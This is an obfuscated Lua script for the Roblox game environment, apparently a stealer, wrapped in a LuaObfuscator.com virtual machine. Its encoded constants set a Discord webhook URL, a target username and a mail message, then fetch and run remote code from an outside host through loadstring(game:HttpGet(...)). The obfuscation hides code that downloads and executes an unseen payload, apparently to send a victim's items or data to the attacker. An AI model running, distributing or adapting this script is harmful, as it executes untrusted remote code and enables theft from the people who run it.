--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v96=v5(v83,v19);v19=nil;return v96;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -(0 -0))) then v85=(v31/((3 -1)^(v32-(2 -(1066 -(68 + 997))))))%((621 -(555 + 64))^(((v33-((2202 -(226 + 1044)) -(857 + 74))) -(v32-((2477 -1908) -(367 + 201)))) + (928 -(214 + 713)))) ;return v85-(v85%(1 + 0)) ;end end else local v86=(1 + (118 -(32 + 85)))^(v32-(878 -(282 + 595))) ;return (((v31%(v86 + v86))>=v86) and (1638 -(1523 + 114))) or (0 + 0) ;end end local function v21() local v34=0;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (958 -(892 + 65)) ;v34=2 -1 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;return (v37 * (606 -(87 + 263))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + (11 -8) + 1 ;return (v41 * (41190819 -24413603)) + (v40 * (48199 + 17337)) + (v39 * 256) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=953 -(802 + 150) ;local v45=(v20(v43,2 -1 ,36 -16 ) * ((2 + (0 -0))^(1029 -(915 + (520 -(145 + 293)))))) + v42 ;local v46=v20(v43,59 -38 ,19 + 12 );local v47=((v20(v43,41 -(439 -(44 + 386)) )==(1188 -(1069 + 118))) and  -(2 -1)) or (1 -0) ;if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else v46=1;v44=791 -((1854 -(998 + 488)) + 135 + 288) ;end elseif (v46==(6433 -4386)) then return ((v45==(18 -(10 + 8))) and (v47 * ((3 -2)/((362 + 80) -(416 + 26))))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((6 -4)^(23 + 29)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(772 -(201 + 571))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1139 -(116 + 1022)) );v18=v18 + v48 ;local v50={};for v66=1, #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==0) then v52=0 -0 ;v53=nil;v51=1637 -(1373 + 263) ;end if (v51==(1004 -(451 + 549))) then while true do if (v52==(1 + 2)) then v59=nil;while true do local v97=0 -0 ;local v98;while true do if (v97==0) then v98=0;while true do if (v98~=(1 -0)) then else if (v53==0) then local v147=0;while true do if (v147~=(1385 -(746 + 638))) then else v56={};v57={v54,v55,nil,v56};v147=2;end if (v147==0) then v54={};v55={};v147=1;end if (v147~=2) then else v53=1;break;end end end break;end if ((341 -(218 + 123))==v98) then if (v53~=(1583 -(1535 + 46))) then else local v148=0 + 0 ;local v149;while true do if (0==v148) then v149=0 + 0 ;while true do if (v149==0) then for v156=561 -(306 + 254) ,v23() do local v157=0 + 0 ;local v158;local v159;local v160;while true do if (v157==(1 -0)) then v160=nil;while true do if (v158==0) then local v169=1467 -(899 + 568) ;local v170;while true do if (v169~=(0 + 0)) then else v170=0;while true do if (v170==(2 -1)) then v158=1;break;end if (v170==0) then v159=603 -(268 + 335) ;v160=nil;v170=291 -(60 + 230) ;end end break;end end end if (v158==(573 -(426 + 146))) then while true do if (v159~=0) then else v160=v21();if (v20(v160,1,1)~=0) then else local v174=0;local v175;local v176;local v177;local v178;local v179;while true do if (v174~=2) then else v179=nil;while true do if (0==v175) then local v181=0;local v182;while true do if (v181==(0 + 0)) then v182=0;while true do if (v182~=(1456 -(282 + 1174))) then else local v193=811 -(569 + 242) ;while true do if (v193~=(2 -1)) then else v182=1 + 0 ;break;end if (v193~=(1024 -(706 + 318))) then else v176=1251 -(721 + 530) ;v177=nil;v193=1272 -(945 + 326) ;end end end if (v182==1) then v175=1;break;end end break;end end end if (v175==2) then while true do if (v176~=(0 -0)) then else local v184=0 + 0 ;local v185;while true do if (v184==(700 -(271 + 429))) then v185=0;while true do if (v185~=0) then else local v197=0;while true do if (v197==(0 + 0)) then v177=v20(v160,2,3);v178=v20(v160,4,6);v197=1;end if (1~=v197) then else v185=1;break;end end end if (v185~=1) then else v176=1;break;end end break;end end end if (v176~=3) then else if (v20(v178,1503 -(1408 + 92) ,1089 -(461 + 625) )~=1) then else v179[1292 -(993 + 295) ]=v59[v179[1 + 3 ]];end v54[v156]=v179;break;end if (v176~=2) then else local v187=1171 -(418 + 753) ;local v188;local v189;while true do if (v187==1) then while true do if (v188~=0) then else v189=0;while true do if (v189~=1) then else v176=2 + 1 ;break;end if (v189~=(0 + 0)) then else local v200=0;while true do if (v200~=0) then else if (v20(v178,1,1 + 0 )==(1 + 0)) then v179[2]=v59[v179[531 -(406 + 123) ]];end if (v20(v178,2,2)==(1770 -(1749 + 20))) then v179[3]=v59[v179[3]];end v200=1 + 0 ;end if (v200==1) then v189=1323 -(1249 + 73) ;break;end end end end break;end end break;end if (v187==(0 + 0)) then v188=0;v189=nil;v187=1;end end end if (v176~=(1146 -(466 + 679))) then else local v190=0 -0 ;while true do if (v190==0) then v179={v22(),v22(),nil,nil};if (v177==0) then local v194=0 -0 ;local v195;local v196;while true do if (v194==1) then while true do if (v195==(0 -0)) then v196=0;while true do if (v196==(114 -(4 + 110))) then v179[3]=v22();v179[588 -(57 + 527) ]=v22();break;end end break;end end break;end if (v194==0) then local v199=1427 -(41 + 1386) ;while true do if (0==v199) then v195=103 -(17 + 86) ;v196=nil;v199=1 + 0 ;end if (v199==1) then v194=1 -0 ;break;end end end end elseif (v177==(2 -1)) then v179[3]=v23();elseif (v177==(168 -(122 + 44))) then v179[5 -2 ]=v23() -((6 -4)^(14 + 2)) ;elseif (v177==(1 + 2)) then local v202=0;while true do if (v202==(0 -0)) then v179[68 -(30 + 35) ]=v23() -(2^16) ;v179[4]=v22();break;end end end v190=1;end if (v190==(1 + 0)) then v176=2;break;end end end end break;end if (v175==(1258 -(1043 + 214))) then local v183=0 -0 ;while true do if (v183~=0) then else v178=nil;v179=nil;v183=1213 -(323 + 889) ;end if (1==v183) then v175=2;break;end end end end break;end if ((0 -0)==v174) then v175=0;v176=nil;v174=1;end if (v174==(581 -(361 + 219))) then v177=nil;v178=nil;v174=322 -(53 + 267) ;end end end break;end end break;end end break;end if (v157~=(0 + 0)) then else v158=0;v159=nil;v157=1;end end end for v161=1,v23() do v55[v161-1 ]=v28();end v149=414 -(15 + 398) ;end if (v149~=1) then else return v57;end end break;end end end if (v53==(983 -(18 + 964))) then local v150=0 -0 ;while true do if (v150==1) then local v153=0;while true do if (v153==1) then v150=2 + 0 ;break;end if (v153~=(0 + 0)) then else for v163=1,v58 do local v164=850 -(20 + 830) ;local v165;local v166;local v167;while true do if (v164==1) then v167=nil;while true do if ((0 + 0)==v165) then local v171=0;local v172;while true do if (v171~=(126 -(116 + 10))) then else v172=0 + 0 ;while true do if (v172==(738 -(542 + 196))) then local v180=0 -0 ;while true do if ((0 + 0)==v180) then v166=v21();v167=nil;v180=1;end if (v180==1) then v172=1 + 0 ;break;end end end if (1==v172) then v165=1 + 0 ;break;end end break;end end end if (v165==1) then if (v166==(2 -1)) then v167=v21()~=(0 -0) ;elseif (v166==(1553 -(1126 + 425))) then v167=v24();elseif (v166==3) then v167=v25();end v59[v163]=v167;break;end end break;end if (v164==(405 -(118 + 287))) then local v168=0;while true do if (v168==0) then v165=0;v166=nil;v168=1;end if ((3 -2)==v168) then v164=1;break;end end end end end v57[1124 -(118 + 1003) ]=v21();v153=2 -1 ;end end end if (v150~=2) then else v53=379 -(142 + 235) ;break;end if (v150==0) then local v154=0;while true do if ((4 -3)==v154) then v150=1 + 0 ;break;end if (v154~=(977 -(553 + 424))) then else v58=v23();v59={};v154=1;end end end end end v98=1 -0 ;end end break;end end end break;end if (v52~=1) then else local v94=0;while true do if (v94==1) then v52=2;break;end if (v94~=(0 + 0)) then else v55=nil;v56=nil;v94=1 + 0 ;end end end if (v52==(2 + 0)) then v57=nil;v58=nil;v52=3;end if (v52==0) then local v95=0;while true do if (v95~=(0 + 0)) then else v53=0 + 0 ;v54=nil;v95=2 -1 ;end if (v95~=(2 -1)) then else v52=2 -1 ;break;end end end end break;end if (v51~=3) then else v58=nil;v59=nil;v51=2 + 2 ;end if (v51~=(9 -7)) then else v56=nil;v57=nil;v51=3;end if (v51==(754 -(239 + 514))) then v54=nil;v55=nil;v51=1 + 1 ;end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=5) then if (v81<=2) then if (v81<=0) then v78[v80[2]]();elseif (v81>1) then local v108;local v109,v110;local v111;local v112;v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v112=v80[2];v111=v78[v80[3]];v78[v112 + 1 ]=v111;v78[v112]=v111[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v112=v80[2];v109,v110=v71(v78[v112](v13(v78,v112 + 1 ,v80[3])));v73=(v110 + v112) -1 ;v108=0;for v134=v112,v73 do local v135=0;while true do if (v135==0) then v108=v108 + 1 ;v78[v134]=v109[v108];break;end end end v72=v72 + 1 ;v80=v68[v72];v112=v80[2];v78[v112]=v78[v112](v13(v78,v112 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];else local v122=0;local v123;local v124;local v125;local v126;while true do if (v122==1) then v73=(v125 + v123) -1 ;v126=0;v122=2;end if (0==v122) then v123=v80[2];v124,v125=v71(v78[v123](v13(v78,v123 + 1 ,v80[3])));v122=1;end if (v122==2) then for v145=v123,v73 do local v146=0;while true do if (v146==0) then v126=v126 + 1 ;v78[v145]=v124[v126];break;end end end break;end end end elseif (v81<=3) then v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v72=v80[3];elseif (v81==4) then v72=v80[3];else v78[v80[2]]=v80[3];end elseif (v81<=8) then if (v81<=6) then local v103=v80[2];v78[v103]=v78[v103](v13(v78,v103 + 1 ,v73));elseif (v81>7) then v62[v80[3]]=v78[v80[2]];elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=9) then local v105=0;local v106;local v107;while true do if (v105==0) then v106=v80[2];v107=v78[v80[3]];v105=1;end if (v105==1) then v78[v106 + 1 ]=v107;v78[v106]=v107[v80[4]];break;end end elseif (v81>10) then v78[v80[2]]=v62[v80[3]];else do return;end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323435372O382O353438363132312O3930312F426A6B4C51737A506E77414370764B585074612O764739684271676D534E49555A3078546F6B4D4177702O6B51476B5F487A5A476B6F6962726F4D4146535935534F4335030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031B3O00682O7470733A2O2F65676F72696B7573612E73706163652F2O746403083O00557365726E616D6503073O004465666F6D3237030B3O004D61696C4D652O7361676503103O007368655F64655F6D657265206265737400163O0012053O00013O0026073O000D00010002002O043O000D0001001205000100043O001202000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001500010026073O000100010001002O043O000100010012050001000A3O001203000100093O00122O0001000C3O00122O0001000B3O00124O00023O00044O000100012O000A3O00017O00",v9(),...);
